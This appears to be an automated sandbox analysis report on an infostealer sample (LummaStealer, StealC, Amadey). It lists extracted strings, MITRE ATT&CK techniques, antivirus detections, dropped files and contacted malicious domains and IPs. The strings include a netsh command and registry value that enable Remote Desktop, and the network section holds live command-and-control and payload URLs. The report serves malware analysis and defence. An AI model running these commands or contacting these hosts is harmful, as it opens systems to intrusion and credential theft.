qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i IRv9YSnbnquI4KZbO0WMHR+MHV+I2GqeOil3oNpHzxpFx==cB==Go0sbPV5MR== 3mjcyBvDj6e4Ir=830wce0oDAJoRIsoO30YUeKW2Y0fM5gvaKKjOO9pgp==RIOt0VOd3VSb6IA9NW4zVTVcL3 g6J9d qJ=NY4ndeJ=P3Kxdy0u43uZAGsdVk==OWSDWs==RHKs0yJcL3Wd6ZElaL =OHdheyduzGefQi==NW4FJA3uWydWPXyNRYIX qaQaI==NnqY0y0iQX6eRZD=QndweydqR3dubydvN3drcUWrS3qsSy0iQX6eRZD=JEJwNrVXEkdYGS== nN=a3N=N3dsey0q5D2O7ZwhLmqj OB3fQskhdQzWndwcK6gPYSbGAwe97KkVyJBjMRwQI0xIT5rMK5pARuBcU WQX6UDWMl 7ql9Up3fP0xT9Bq94OrMOWd5HF1AI0d90JZEeVkizvlToBq8XCjceKpQU1cFh5IRUdq5HWo6EWQb1qbKaFkhAsvfMNlaHqtcadrP4Sf6EWvaLybUO4QH RNARtrMK5pCT1=IT5LD9==M4Shdb5tInuu0o==N3dsey0q5D2O7ZwhLmq89zFvfPEkiwlz9jd2MPiZ5z2g45EpI1Ko8yZx3V0n4MQ=R2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7I44p LKQVPNR3PSo2uNz9YGZey0uKnGnRS==N3drdz0WQYKIQYWhVXOh0y0iQ3ij3ooo90Ul9zJBhWI4idd8bYtuNLNvEEVWFBb1IZX=IY0sbOSrQHVnR2qRWw0JOFOV5pEh9rGt8U93hf0vZSV4UFStcfWu33y7NY0laKKaRepn4P0fVQ9SSGONUxCSJVSzL3r=R2qRWw0JOFOp4pMu96mJVPUzRwwfZSVCanqh0PS9HnGt3YIA81Cm8yJ82yQs4wVzSnqi0OdFIB==UEFuNvF=OH0kZP0o5GOf6JMl9q3pHdlV4QEygxV48XdsOH0kZP0o5GOf6JMl9q3pHdpV4QEygxV48XdsR1dEWxixLlW7LYgf qYp8U332y5sgcRza4ReUdW9H4Ws5oQqaJOb9fRsgVV=RIOt0z0f5F6b4YP=JkFvPI==JkFwN9==JkFvO9==JkFwOI==N40wde0q5FKV3YsgUB==Lkt4 o0s0yCoDAJoRZchI3xeFoWfdUyn2XymAE4iFGYf8KElFjFkKaGW2X2f45QWFHt7Fa2j4zMvNq==Gj3eSPml5DJ=FjFkKaGuQX5aFD3kJs==RHd10POv2HWm4E0hbKJ=IX020OSX5Hmp4pwr9Ka aKFB4PSyiwVD8Xis0OVcCV0j4IPcFk==Fh== 3mZeyWr535aDZHcI1F7Is== 4V7do== nKs0ydpP303Zedd4nRaLIA197KQTxFB4Poy3MQ=JEFuNvFWDUl=JEFuNvFWDkJ=JEFuNvFWDkN=JEFuNvFWD3Z=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	1 Create Account	312 Process Injection	4 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	11 Scheduled Task/Job	33 Software Packing	NTDS	247 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	971 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	361 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	361 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	61%	ReversingLabs	Win32.Trojan.LummaStealer
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Avira	HEUR/AGEN.1306956
C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\BlueMail[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	68%	ReversingLabs	Win32.Trojan.Mikey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	67%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	67%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	68%	ReversingLabs	Win32.Trojan.Mikey
C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1014886001\994907c116.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	61%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Y-Cleaner.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label
dare-curbys.biz	100%	URL Reputation	malware
impend-differ.biz	100%	URL Reputation	malware
covery-mover.biz	100%	URL Reputation	malware
dwell-exclaim.biz	100%	URL Reputation	malware
zinc-sneark.biz	100%	URL Reputation	malware
formy-spill.biz	100%	URL Reputation	malware
se-blurry.biz	100%	URL Reputation	malware
print-vexer.biz	100%	URL Reputation	malware

Name	IP	Active	Malicious	Antivirus Detection	Reputation
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false		high
chrome.cloudflare-dns.com	172.64.41.3	true	false		high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false
plus.l.google.com	172.217.17.78	true	false
t.me	149.154.167.99	true	false
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false
fightlsoser.click	104.21.35.43	true	true
youtube.com	142.250.181.78	true	false
steamcommunity.com	23.55.153.106	true	true
sb.scorecardresearch.com	3.160.188.68	true	false
www.google.com	172.217.19.228	true	false
drive-connect.cyou	104.21.79.7	true	true
zonedw.sbs	116.203.10.31	true	true
dare-curbys.biz	unknown	unknown	true	100%, URL Reputation
impend-differ.biz	unknown	unknown	true	100%, URL Reputation
c.msn.com	unknown	unknown	true
covery-mover.biz	unknown	unknown	true	100%, URL Reputation
ntp.msn.com	unknown	unknown	true
dwell-exclaim.biz	unknown	unknown	true	100%, URL Reputation
assets.msn.com	unknown	unknown	true
zinc-sneark.biz	unknown	unknown	true	100%, URL Reputation
detectportal.firefox.com	unknown	unknown	true
formy-spill.biz	unknown	unknown	true	100%, URL Reputation
bzib.nelreports.net	unknown	unknown	true
se-blurry.biz	unknown	unknown	true	100%, URL Reputation
print-vexer.biz	unknown	unknown	true	100%, URL Reputation
apis.google.com	unknown	unknown	true
api.msn.com	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fightlsoser.click/api	true
http://185.215.113.206/	true
formy-spill.biz	true
http://185.215.113.206/68b591d6548ec281/nss3.dll	true
https://sb.scorecardresearch.com/b?rn=1734119253184&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=27D5836E84FB6FA100DF963A85896E2B&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false
https://steamcommunity.com/profiles/76561199724331900	true
https://c.msn.com/c.gif?rnd=1734119253183&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5ff571afa9e8406fa25abf234ff9d93b&activityId=5ff571afa9e8406fa25abf234ff9d93b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=BEF20EC394EF4A05A49DA5FBE8E211E1&MUID=27D5836E84FB6FA100DF963A85896E2B	false
dwell-exclaim.biz	true
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119262630&w=0&anoncknm=app_anon&NoResponseBody=true	false
http://80.82.65.70/dll/download	false
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false
http://sanboxland.pro/3ofn3jf3e2ljk/index.php	true
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119261935&w=0&anoncknm=app_anon&NoResponseBody=true	false
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119261932&w=0&anoncknm=app_anon&NoResponseBody=true	false

URLs from Memory and Binaries

Name	Source	Malicious
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/34522	chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4633	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7382	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://www.gstatic.cn/recaptcha/	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://anglebug.com/6574supportsExternalSemaphoreFd	chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	false
https://og.google.com	chrome.exe, 00000019.00000002.2815909454.00006AE4010F8000.00000004.00000800.00020000.00000000.sdmp	false
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000019.00000003.2391832280.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391727899.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2386269536.00006AE400F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742537643.00006AE4002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2390457029.00006AE401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391162524.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391377595.00006AE40104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2388080460.00006AE401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2392772851.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391783961.00006AE400A24000.00000004.00000800.00020000.00000000.sdmp	false
https://covery-mover.biz/api	3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	false
https://google-ohttp-relay-join.fastly-edge.com/yr	chrome.exe, 00000019.00000003.2441094805.00006AE40158C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441242471.00006AE401594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441134276.00006AE401590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441051239.00006AE401588000.00000004.00000800.00020000.00000000.sdmp	false
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	false
https://google-ohttp-relay-join.fastly-edge.com/yt	chrome.exe, 00000019.00000003.2441094805.00006AE40158C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441242471.00006AE401594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441134276.00006AE401590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441051239.00006AE401588000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/6929	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	false
http://anglebug.com/68765	chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7246	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806787022.00006AE400830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://stackoverflow.com/q/14436606/23354	BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7369	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7489	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp	false
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000019.00000003.2391832280.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391727899.00006AE400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2386269536.00006AE400F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742537643.00006AE4002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2390457029.00006AE401080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391162524.00006AE400F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393431782.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391377595.00006AE40104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2388080460.00006AE401030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2392772851.00006AE400F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2391783961.00006AE400A24000.00000004.00000800.00020000.00000000.sdmp	false
https://issuetracker.google.com/161903006	chrome.exe, 00000019.00000003.2377753382.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377855397.00006AE4007A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377105667.00006AE4003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811252072.00006AE400C74000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp	false
https://lv.queniujq.cn	a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	false
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2814336252.00006AE400EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806448175.00006AE400788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744752570.00006AE4004B4000.00000004.00000800.00020000.00000000.sdmp	false
